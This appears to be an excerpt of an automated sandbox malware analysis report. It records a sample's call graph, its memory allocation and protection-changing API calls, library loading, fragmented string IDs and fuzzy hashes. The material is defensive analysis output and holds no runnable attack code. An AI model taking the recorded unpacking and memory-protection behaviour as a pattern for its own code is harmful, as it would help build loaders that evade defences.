107759->108126 108127 2928d57 15 API calls 107759->108127 108128 2953152 VirtualProtect 107759->108128 108129 2925d5b 25 API calls 107759->108129 108130 2925559 25 API calls 107759->108130 108131 2942959 2 API calls 107759->108131 108132 2927940 27 API calls 107759->108132 108133 2960976 4 API calls 107759->108133 108134 2925970 25 API calls 107759->108134 108135 2926977 27 API calls 107759->108135 108136 2940971 15 API calls 107759->108136 108137 294297e VirtualProtect 107759->108137 108138 292717e 25 API calls 107759->108138 108139 292897c 19 API calls 107759->108139 108140 292917d 11 API calls 107759->108140 108141 2962579 6 API calls 107759->108141 108142 2924566 29 API calls 107759->108142 108143 2923967 45 API calls 107759->108143 108144 2924964 29 API calls 107759->108144 108145 2927565 25 API calls 107759->108145 108146 2925965 25 API calls 107759->108146 108147 2927d6a 25 API calls 107759->108147 108148 296b16f 2 API calls 107759->108148 108149 2942d6d VirtualProtect 107759->108149 108150 292316c VirtualProtect 107759->108150 107764->107763 107765->107763 107766->107763 107767->107763 107768->107763 107769->107763 107770->107763 107771->107763 107772->107763 107773->107763 107774->107763 107775->107763 107776->107763 107777->107763 107778->107763 107779->107763 107780->107763 107781->107763 107782->107763 107783->107763 107784->107763 107785->107763 107786->107763 107787->107763 107788->107763 107789->107763 107790->107763 107791->107763 107792->107763 107793->107763 107794->107763 107795->107763 107796->107763 107797->107763 107798->107763 107799->107763 107800->107763 107801->107763 107802->107763 107803->107763 107804->107763 107805->107763 107806->107763 107807->107763 107808->107763 107809->107763 107810->107763 107811->107763 107812->107763 107813->107763 107814->107763 107815->107763 107816->107763 107817->107763 107818->107763 107819->107763 107820->107763 107821->107763 107822->107763 107823->107763 107824->107763 107825->107763 107826->107763 
107827->107763 107828->107763 107829->107763 107830->107763 107831->107763 107832->107763 107833->107763 107834->107763 107835->107763 107836->107763 107837->107763 107838->107763 107839->107763 107840->107763 107841->107763 107842->107763 107843->107763 107844->107763 107845->107763 107846->107763 107847->107763 107848->107763 107849->107763 107850->107763 107851->107763 107852->107763 107853->107763 107854->107763 107855->107763 107856->107763 107857->107763 107858->107763 107859->107763 107860->107763 107861->107763 107862->107763 107863->107763 107864->107763 107865->107763 107866->107763 107867->107763 107868->107763 107869->107763 107870->107763 107871->107763 107872->107763 107873->107763 107874->107763 107875->107763 107876->107763 107877->107763 107878->107763 107879->107763 107880->107763 107881->107763 107882->107763 107883->107763 107884->107763 107885->107763 107886->107763 107887->107763 107888->107763 107889->107763 107890->107763 107891->107763 107892->107763 107893->107763 107894->107763 107895->107763 107896->107763 107897->107763 107898->107763 107899->107763 107900->107763 107901->107763 107902->107763 107903->107763 107904->107763 107905->107763 107906->107763 107907->107763 107908->107763 107909->107763 107910->107763 107911->107763 107912->107763 107913->107763 107914->107763 107915->107763 107916->107763 107917->107763 107918->107763 107919->107763 107920->107763 107921->107763 107922->107763 107923->107763 107924->107763 107925->107763 107926->107763 107927->107763 107928->107763 107929->107763 107930->107763 107931->107763 107932->107763 107933->107763 107934->107763 107935->107763 107936->107763 107937->107763 107938->107763 107939->107763 107940->107763 107941->107763 107942->107763 107943->107763 107944->107763 107945->107763 107946->107763 107947->107763 107948->107763 107949->107763 107950->107763 107951->107763 107952->107763 107953->107763 107954->107763 107955->107763 107956->107763 107957->107763 107958->107763 107959->107763 
114359->114362 114366 2927ef1 114359->114366 114362->114366 114366->114348 114378 2962ce9 114377->114378 114379 2963305 VirtualProtect 114378->114379 114382 29297b0 114381->114382 114383 29298a5 114382->114383 114384 2929820 4 API calls 114382->114384 114395 296ebd3 114393->114395 114394 296f345 VirtualAlloc 114395->114394 114398 29408eb 114397->114398 114399 2940dbf 114398->114399 114406 294167a 114398->114406 114424 2928039 114423->114424 114425 29280f9 23 API calls 114424->114425 114454 29248db LoadLibraryW 114453->114454 114456 2924c67 LoadLibraryW 114454->114456 114457 2924c84 114454->114457 114456->114457 114491 292943a 114490->114491 114492 29294df 114491->114492 114493 2929466 114491->114493 114522 29263e9 114510->114522 114511 29282a3 114512 2927e50 VirtualAlloc 114522->114511 114522->114512 114525 29280f9 23 API calls 114522->114525 114529 2927ef1 114522->114529 114525->114529 114529->114511 114552 29270d4 114540->114552 114541 29282a3 114542 2927e50 VirtualAlloc 114552->114541 114552->114542 114555 29280f9 23 API calls 114552->114555 114559 2927ef1 114552->114559 114555->114559 114559->114541 114571 29618db 114570->114571 114573 29627e6 VirtualProtect 114571->114573 114575 2962785 114571->114575 114573->114575 114577 29608c5 114576->114577 114578 2960dd2 114577->114578 114582 29616ca 114577->114582 114589 2941410 114586->114589 114587 29414c7 12 API calls 114589->114587 114609 29620bc 114608->114609 114615 29240d4 LoadLibraryW 114614->114615 114652 296088b 114651->114652 114662 2926c01 114661->114662 114696 294088a 114695->114696 114697 2940dbf 114696->114697 114704 294167a 114696->114704 114722 2940bac 114721->114722 114723 2940dbf 114722->114723 114730 294167a 114722->114730 114748 2960bb0 114747->114748 114749 2960dd2 114748->114749 114752 29616ca 114748->114752 114758 294189f 114757->114758 114759 2942316 7 API calls 114758->114759 114765 29426d4 114758->114765 114776 2929c9f 114775->114776 114777 2929cbb VirtualFree 114776->114777 114778 2929cf5 
VirtualFree 114776->114778 114778->114777 114782 2929c9f 114781->114782 114783 2929cf5 VirtualFree 114782->114783 114784 2929cbb VirtualFree 114782->114784 114783->114784 114788 295309a VirtualProtect 114787->114788 114789 29530c5 VirtualProtect 114788->114789 114793 292943a 114792->114793 114794 29294d8 114793->114794 114796 2929466 114793->114796 114813 2941f8a 114812->114813 114814 2942316 7 API calls 114813->114814 114820 29426d4 114813->114820 114833 294246c 114830->114833 114831 29424dc 4 API calls 114831->114833 114832 2942631 114833->114831 114833->114832 114834 294260d 2 API calls 114833->114834 114840 294268f 114833->114840 114834->114833 114854 292676e 114842->114854 114843 29282a3 114844 2927e50 VirtualAlloc 114854->114843 114854->114844 114857 29280f9 23 API calls 114854->114857 114861 2927ef1 114854->114861 114857->114861 114861->114843 114873 2941410 114872->114873 114874 29414c7 12 API calls 114873->114874 114895 2941410 114894->114895 114896 29414c7 12 API calls 114895->114896 114917 2940b69 114916->114917 114918 2940dbf 114917->114918 114925 294167a 114917->114925 114943 29431c8 VirtualProtect 114942->114943 114945 2943233 114943->114945 114945->107358 114947 2923a45 114946->114947 114948 2923dc4 41 API calls 114947->114948 114953 2923dcc 114947->114953 114988 29431c8 VirtualProtect 114987->114988 114990 2943233 114988->114990 114990->107358 115003 29265cc 114991->115003 114992 29282a3 114993 2927e50 VirtualAlloc 115003->114992 115003->114993 115006 29280f9 23 API calls 115003->115006 115010 2927ef1 115003->115010 115006->115010 115010->114992 115022 2926dfd 115021->115022 115023 2926e0a 115022->115023 115037 2926ed8 115022->115037 115056 294176b 115055->115056 115057 2942316 7 API calls 115056->115057 115063 29426d4 115056->115063 115075 292876a VirtualAlloc 115073->115075 115076 2928a08 115075->115076 115096 2962751 115095->115096 115097 29627e6 VirtualProtect 115096->115097 115100 2962785 115096->115100 115097->115100 115102 296ca6c 
115101->115102 115104 296df60 115102->115104 115105 296ca96 115102->115105 115124 2961755 115123->115124 115125 2962785 115124->115125 115127 29627e6 VirtualProtect 115124->115127 115127->115125 115130 296ca6c 115129->115130 115132 296ca96 115130->115132 115137 296df60 115130->115137 115152 2924e67 115151->115152 115153 2925089 115152->115153 115168 2925956 115152->115168 115186 2926dfd 115185->115186 115187 2926e0a 115186->115187 115201 2926ed8 115186->115201 115220 29288e9 VirtualAlloc 115219->115220 115222 2928a08 115220->115222 115242 296276f 115241->115242 115243 2962785 115242->115243 115244 29627e6 VirtualProtect 115242->115244 115244->115243 115248 2961da9 115247->115248 115250 29627e6 VirtualProtect 115248->115250 115252 2962785 115248->115252 115250->115252 115254 2941f11 115253->115254 115255 2942316 7 API calls 115254->115255 115261 29426d4 115254->115261 115284 292758c 115271->115284 115272 29282a3 115273 2927e50 VirtualAlloc 115284->115272 115284->115273 115286 29280f9 23 API calls 115284->115286 115290 2927ef1 115284->115290 115286->115290 115290->115272 115302 292758c 115301->115302 115303 29282a3 115302->115303 115304 2927e50 VirtualAlloc 115302->115304 115316 29280f9 23 API calls 115302->115316 115320 2927ef1 115302->115320 115316->115320 115320->115303 115338 2928f60 115331->115338 115341 2928f6f 115331->115341 115332 2929251 115338->115332 115339 2929292 115338->115339 115341->115338 115342 29291dc 11 API calls 115341->115342 115342->115338 115357 296bf21 115356->115357 115359 296df60 115357->115359 115360 296ca96 115357->115360 115379 2940b38 115378->115379 115380 2940dbf 115379->115380 115387 294167a 115379->115387 115405 2941f0a 115404->115405 115406 2942316 7 API calls 115405->115406 115412 29426d4 115405->115412 115435 292630c 115422->115435 115423 29282a3 115424 2927e50 VirtualAlloc 115435->115423 115435->115424 115437 29280f9 23 API calls 115435->115437 115441 2927ef1 115435->115441 115437->115441 115441->115423 115453 2940b0a 
115452->115453 115454 2940dbf 115453->115454 115461 294167a 115453->115461 115479 2961da9 115478->115479 115481 29627e6 VirtualProtect 115479->115481 115483 2962785 115479->115483 115481->115483 115485 2928b3e 115484->115485 115493 2928b4d 115484->115493 115486 2928dd7 115485->115486 115492 29296a4 115485->115492 115487 2928bc6 15 API calls 115487->115493 115493->115485 115493->115487 115495 2928d57 15 API calls 115493->115495 115497 2928d02 13 API calls 115493->115497 115495->115493 115497->115493 115552->109024 115869 405855 115870 40571b VirtualProtect 115869->115870 115872 4059ad 115870->115872 115873 31fc670 ReadFile 115874 41564e 115875 415675 115874->115875 115878 415683 115875->115878 115880 4156c3 115878->115880 115882 4156b2 NtQueryDefaultLocale 115878->115882 115880->115882 115884 41593f 115880->115884 115883 4159d7 115882->115883 115885 415976 NtQueryDefaultLocale 115884->115885 115887 4159d7 115885->115887

                                Control-flow Graph

                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726809063.0000000002920000.00000020.00001000.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2920000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: 5CCI$=K:3$E$HYW$L$L$L$L$L$L$P$W$W$W$[P$a$a$a$a$a$a$b$b$b$c$d$d$d$e$i$i$i$i$o$o$o$o$r$r$r$r$r$r$r$s$s$t$x$y$y$y
                                • API String ID: 0-960091691
                                • Opcode ID: b64be6ccaf423245a3e003afef22b77d992e5c96695135af63615d315855449e
                                • Instruction ID: 30aa24d1d5f4ff378057e35fdd825edfda4cf6aafe2c08ec629bfcb43e02575c
                                • Opcode Fuzzy Hash: b64be6ccaf423245a3e003afef22b77d992e5c96695135af63615d315855449e
                                • Instruction Fuzzy Hash: B942F451D186A88AF7258B24DC44BAA7B75EF91300F0490FDC08DAB281D67E5FC5CF66

                                Control-flow Graph

                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726809063.0000000002920000.00000020.00001000.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2920000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: A$E$F$L$L$L$L$P$S$V$V$W$W$[W$a$a$a$a$a$a$b$b$c$c$d$d$e$e$e$i$i$i$i$i$l$l$l$l$o$o$o$o$r$r$r$r$r$r$r$r$s$s$t$t$t$u$u$x$y$y
                                • API String ID: 0-2002451845
                                • Opcode ID: efd57313e90d302c46f2a1d1f05d2838b6d4215c80f8e6a728908e52be8c74ec
                                • Instruction ID: 9f1590d0bfc547174e305633f57310ed5f998bcc451510479ddd10548f7ed579
                                • Opcode Fuzzy Hash: efd57313e90d302c46f2a1d1f05d2838b6d4215c80f8e6a728908e52be8c74ec
                                • Instruction Fuzzy Hash: C952E7A1D182A49AF7218A24DC44BEBBB79EF91304F0480F9D54CA7685D67E0FC5CF62

                                Control-flow Graph

                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726809063.0000000002920000.00000020.00001000.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2920000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: A$E$F$L$L$L$L$P$S$V$V$W$W$[W$a$a$a$a$a$a$b$b$c$c$d$d$e$e$e$i$i$i$i$i$l$l$l$l$o$o$o$o$r$r$r$r$r$r$r$r$s$s$t$t$t$u$u$x$y$y
                                • API String ID: 0-2002451845
                                • Opcode ID: 9553e75a72e40f26fe79fd54f2cf19ddf64e684f6323868e429e79f9732920fe
                                • Instruction ID: 4f4550d3098ad6facbbf37dc2b042d28c06d46ec2f96581196765d2ff6dc4269
                                • Opcode Fuzzy Hash: 9553e75a72e40f26fe79fd54f2cf19ddf64e684f6323868e429e79f9732920fe
                                • Instruction Fuzzy Hash: BA52D7A1D182A49AF7218A24DC44BEBBB79EF91304F0480F9D54CA7685D67E0FC5CF62

                                Control-flow Graph

                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726809063.0000000002920000.00000020.00001000.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2920000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: A$E$F$L$L$L$L$P$S$V$V$W$W$[W$a$a$a$a$a$a$b$b$c$c$d$d$e$e$e$i$i$i$i$i$l$l$l$l$o$o$o$o$r$r$r$r$r$r$r$r$s$s$t$t$t$u$u$x$y$y
                                • API String ID: 0-2002451845
                                • Opcode ID: 38dff1ae8c2d2d53c5591eb9686cd7c5c85d21a4621ec7c6753db7981aa2ffdd
                                • Instruction ID: d049ab8625e116ce85a4081235ebdfd08116d339f1c6c5ddbdafd06911673f2c
                                • Opcode Fuzzy Hash: 38dff1ae8c2d2d53c5591eb9686cd7c5c85d21a4621ec7c6753db7981aa2ffdd
                                • Instruction Fuzzy Hash: FE52C6A1D182A48AF721CA24DC44BEABB79EF91304F0481F9D44CA7685D67E4FC5CF62

                                Control-flow Graph

                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726809063.0000000002920000.00000020.00001000.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2920000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: A$E$F$L$L$L$L$P$S$V$V$W$W$[W$a$a$a$a$a$a$b$b$c$c$d$d$e$e$e$i$i$i$i$i$l$l$l$l$o$o$o$o$r$r$r$r$r$r$r$r$s$s$t$t$t$u$u$x$y$y
                                • API String ID: 0-2002451845
                                • Opcode ID: 4bc22e3322805561acadf19387d55b21212e7b66c78b3151f9d96d6719b9f659
                                • Instruction ID: 18d7276ada5326199ec5b465c65509de2e02cb9d3ee4b67567631c1be8eb9f55
                                • Opcode Fuzzy Hash: 4bc22e3322805561acadf19387d55b21212e7b66c78b3151f9d96d6719b9f659
                                • Instruction Fuzzy Hash: 1552E7A1D182A48AF721CA24DC44BEABB79EF91304F0481F9D44CA7685D67E4FC5CF62

                                Control-flow Graph
                                [Graph image not reproduced; legend: Executed / Not Executed; labelled API calls in the graph: VirtualAlloc, VirtualFree]
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726809063.0000000002920000.00000020.00001000.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2920000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: A$E$F$L$L$L$L$P$S$V$V$W$W$[W$a$a$a$a$a$a$b$b$c$c$d$d$e$e$e$i$i$i$i$i$l$l$l$l$o$o$o$o$r$r$r$r$r$r$r$r$s$s$t$t$t$u$u$x$y$y
                                • API String ID: 0-2002451845
                                • Opcode ID: 616ac1a679ac117a84ece365be3a50b9897d6d4325b405e82581b447ebcf87a2
                                • Instruction ID: 9657fb59a4dd9ff48890ea055077c99d280af15e8ed45d92b5102886f5de7381
                                • Opcode Fuzzy Hash: 616ac1a679ac117a84ece365be3a50b9897d6d4325b405e82581b447ebcf87a2
                                • Instruction Fuzzy Hash: BA52E8A1D182A48AF721CA24DC44BEABB79EF91304F0480F9D44CA7685D67E4FC5CF62

                                Control-flow Graph
                                [Graph image not reproduced; legend: Executed / Not Executed; labelled API calls in the graph: VirtualAlloc, VirtualFree]
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726809063.0000000002920000.00000020.00001000.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2920000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: A$E$F$L$L$L$L$P$S$V$V$W$W$[W$a$a$a$a$a$a$b$b$c$c$d$d$e$e$e$i$i$i$i$i$l$l$l$l$o$o$o$o$r$r$r$r$r$r$r$r$s$s$t$t$t$u$u$x$y$y
                                • API String ID: 0-2002451845
                                • Opcode ID: 52fd370e9416cd9ebd96abc48bb0425fb7c5b7acc313a5de1e36997f93dde7ec
                                • Instruction ID: 9491a70b1233604e2deaa2c99dcc5d79f53f00a4163003823ff0b6bebd313340
                                • Opcode Fuzzy Hash: 52fd370e9416cd9ebd96abc48bb0425fb7c5b7acc313a5de1e36997f93dde7ec
                                • Instruction Fuzzy Hash: DD52E7A1D182A48AF721CA24DC44BEABB79EF91304F0481F9D44CA7685D67E4FC5CF62

                                Control-flow Graph
                                [Graph image not reproduced; legend: Executed / Not Executed; labelled API calls in the graph: VirtualAlloc, VirtualFree]
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726809063.0000000002920000.00000020.00001000.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2920000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: A$E$F$L$L$L$L$P$S$V$V$W$W$[W$a$a$a$a$a$a$b$b$c$c$d$d$e$e$e$i$i$i$i$i$l$l$l$l$o$o$o$o$r$r$r$r$r$r$r$r$s$s$t$t$t$u$u$x$y$y
                                • API String ID: 0-2002451845
                                • Opcode ID: e327ca36f441c44643adde14fc122138cb157187e31d5bc173bc09c7d14b2767
                                • Instruction ID: 39c82b8ae8fe7c09f9d4590152defbe7385e10e76922b27453465a8b78648935
                                • Opcode Fuzzy Hash: e327ca36f441c44643adde14fc122138cb157187e31d5bc173bc09c7d14b2767
                                • Instruction Fuzzy Hash: 2952D8A1D182A48AF721CA24DC44BEABB79EF91304F0481F9D44CA7685D67E4FC5CF62
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: 6A2P$6I@6$F2=:$HI82$JMI:$L$L$P$V$W$a$a$a$b$c$d$e$i$i$l$o$o$r$r$r$r$t$t$t$u$y
                                • API String ID: 0-2045030226
                                • Opcode ID: 04b3c225d15d2598a2ba00971e6e8a82b29d66233df6064145ebc1d337a52b19
                                • Instruction ID: d4a0d279a450ff8911638313efacce6c364cc0dc6f18a584c9b198c0dafa6515
                                • Opcode Fuzzy Hash: 04b3c225d15d2598a2ba00971e6e8a82b29d66233df6064145ebc1d337a52b19
                                • Instruction Fuzzy Hash: AA2207B1D052A48BE720CB24DC587EA7BB5EF95310F0441FAC44D67281D67A5EC6CFA2
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: 6A2P$6I@6$F2=:$HI82$JMI:$L$L$P$V$W$a$a$a$b$c$d$e$i$i$l$o$o$r$r$r$r$t$t$t$u$y
                                • API String ID: 0-2045030226
                                • Opcode ID: dce7da7ef0f55c8298e165c15a218728c63676c08bfa291e3ff01c29150f2276
                                • Instruction ID: 2103fffe1a853379da3b579409311210e368e4e68e9a3f42ac0acb380f9fc47f
                                • Opcode Fuzzy Hash: dce7da7ef0f55c8298e165c15a218728c63676c08bfa291e3ff01c29150f2276
                                • Instruction Fuzzy Hash: 1A1228B1D092A48AE720CB24DC587EA7BB5EF91310F0441FAC44D67281D67A4FD6CFA2
                                APIs
                                • VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 0296F35A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID: E$L$L$L$L$P$W$W$a$a$a$a$b$b$c$d$d$e$i$i$i$j@h$o$o$o$r$r$r$r$r$s$s$t$x$y$y
                                • API String ID: 4275171209-572641038
                                • Opcode ID: 19555410c92eae7b4f59360e2c593c7c58fd660cfd34fd1e31098275a1338e3b
                                • Instruction ID: 552fa3b961e2e50e235a39b545459134c218602d4d65801ceac1638d9d3a8645
                                • Opcode Fuzzy Hash: 19555410c92eae7b4f59360e2c593c7c58fd660cfd34fd1e31098275a1338e3b
                                • Instruction Fuzzy Hash: E922A0B0D082698BEB20CB24CC58BEABBB6EF85314F0480F9D44DA7681D7795AC5CF55
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: 6A2P$6I@6$F2=:$JMI:$L$L$P$V$W$a$a$a$b$c$d$e$i$i$l$o$o$r$r$r$r$t$t$t$u$y
                                • API String ID: 0-1044622014
                                • Opcode ID: 8ce12532de46d85089ed6e46d883c813e0101caa365115f1e62fcb78115eeea1
                                • Instruction ID: fd48d58170245de9497efe6529a2a6018b6c66d9bb7aedeb6ea851ab40724f05
                                • Opcode Fuzzy Hash: 8ce12532de46d85089ed6e46d883c813e0101caa365115f1e62fcb78115eeea1
                                • Instruction Fuzzy Hash: 6D1228B1D052A48AE720CB64DC587EABBB5EF91310F0441FAC44D67281D67A4FD6CFA2
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: 6A2P$6I@6$F2=:$JMI:$L$L$P$V$W$a$a$a$b$c$d$e$i$i$l$o$o$r$r$r$r$t$t$t$u$y
                                • API String ID: 0-1044622014
                                • Opcode ID: 6c474c9d6309837d7c813467b8a8954442faff26ab2dd0e1c278812940fe72b7
                                • Instruction ID: bfc017c3375aa86a34b404ed803ea53bd1403ae788b44af8284f14c122ece478
                                • Opcode Fuzzy Hash: 6c474c9d6309837d7c813467b8a8954442faff26ab2dd0e1c278812940fe72b7
                                • Instruction Fuzzy Hash: 361217B1D052A48AE720CB64DC587EABBB5EF91310F0441FAC44D67281D77A4ED6CFA2
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: 6A2P$F2=:$JMI:$L$L$P$V$W$a$a$a$b$c$d$e$i$i$l$o$o$r$r$r$r$t$t$t$u$y
                                • API String ID: 0-3437435223
                                • Opcode ID: e287edb47a025dfa8513dadcb44eaabaa558f895183d370b382917b707c1d64d
                                • Instruction ID: e8e154863e9c36c158413c78ef44961efbe953c248123be65b800b10748f5a40
                                • Opcode Fuzzy Hash: e287edb47a025dfa8513dadcb44eaabaa558f895183d370b382917b707c1d64d
                                • Instruction Fuzzy Hash: 7C52D1B1D056A88FEB24CB24DC58BEABBB5AF85310F0440FAC84D67281D6795EC5CF91
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: 6A2P$F2=:$JMI:$L$L$P$V$W$a$a$a$b$c$d$e$i$i$l$o$o$r$r$r$r$t$t$t$u$y
                                • API String ID: 0-3437435223
                                • Opcode ID: bdd6c7eead58c43e009a173631e87bf8b435cacde9c8e814a3ff91392f1d260d
                                • Instruction ID: e50285f70be7219a8a614a6f69bd4df58a07ddbac1c737a6c93b94e215757164
                                • Opcode Fuzzy Hash: bdd6c7eead58c43e009a173631e87bf8b435cacde9c8e814a3ff91392f1d260d
                                • Instruction Fuzzy Hash: 020218B1D092A48AE720CB64DC587EABBB5EF91310F0441FAC44D67281D67A4FD5CFA2
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: 6A2P$F2=:$JMI:$L$L$P$V$W$a$a$a$b$c$d$e$i$i$l$o$o$r$r$r$r$t$t$t$u$y
                                • API String ID: 0-3437435223
                                • Opcode ID: 19b6ed05bf28c5367eba6ff917ff367c779b100d6bd51da910ee435b0cfef367
                                • Instruction ID: 7e10ecede2c2898626ef05d7306b0555679b6bb717c84eb6eff9071590a8569b
                                • Opcode Fuzzy Hash: 19b6ed05bf28c5367eba6ff917ff367c779b100d6bd51da910ee435b0cfef367
                                • Instruction Fuzzy Hash: F40229B1D082A48AE7208764DC587EA7FB5EF91310F0441FAC48D67281D67E4BD6CFA2
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: 6A2P$F2=:$JMI:$L$L$P$V$W$a$a$a$b$c$d$e$i$i$l$o$o$r$r$r$r$t$t$t$u$y
                                • API String ID: 0-3437435223
                                • Opcode ID: 96948fa9488b29b987c3077c0ae36cc61cd63f14841f2dd55fc02dbc7d1ad921
                                • Instruction ID: 32b4b2d96b06ff66172ebf3330edd815c132ebd410c216a719f44140a9d49e41
                                • Opcode Fuzzy Hash: 96948fa9488b29b987c3077c0ae36cc61cd63f14841f2dd55fc02dbc7d1ad921
                                • Instruction Fuzzy Hash: EEF10671D092A48BE7208764DC587EABFB5AF91310F0440FAC84D67281D67A5FD6CFA2
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: 6A2P$F2=:$JMI:$L$L$P$V$W$a$a$a$b$c$d$e$i$i$l$o$o$r$r$r$r$t$t$t$u$y
                                • API String ID: 0-3437435223
                                • Opcode ID: 7feecd47ef524e7802b5d4867b31cab3804689f910d934b41af9d4f821d4ee77
                                • Instruction ID: 18bf6c88944523e1acfef5c39e3d099e716b566e9fe0d771e8772516229ab6b3
                                • Opcode Fuzzy Hash: 7feecd47ef524e7802b5d4867b31cab3804689f910d934b41af9d4f821d4ee77
                                • Instruction Fuzzy Hash: C1F10671D092A48BE7208764DC587EABFB5AF91310F0440FAC44D67281D67A5FD6CFA2
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: 6A2P$F2=:$JMI:$L$L$P$V$W$a$a$a$b$c$d$e$i$i$l$o$o$r$r$r$r$t$t$t$u$y
                                • API String ID: 0-3437435223
                                • Opcode ID: 1035d3dd130e00952cec775d506ed0d9aaa0f903075b395e960ea168f98e97eb
                                • Instruction ID: 35e5ab084cd7be393b2a020972a8eec9c2981d8cdb03ca4716ba6274a4328532
                                • Opcode Fuzzy Hash: 1035d3dd130e00952cec775d506ed0d9aaa0f903075b395e960ea168f98e97eb
                                • Instruction Fuzzy Hash: 30F11971D092A48AE7208764DC587EABFB5AF91310F0440FAC48D67281D67E5BD6CFA2
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: 6A2P$F2=:$JMI:$L$L$P$V$W$a$a$a$b$c$d$e$i$i$l$o$o$r$r$r$r$t$t$t$u$y
                                • API String ID: 0-3437435223
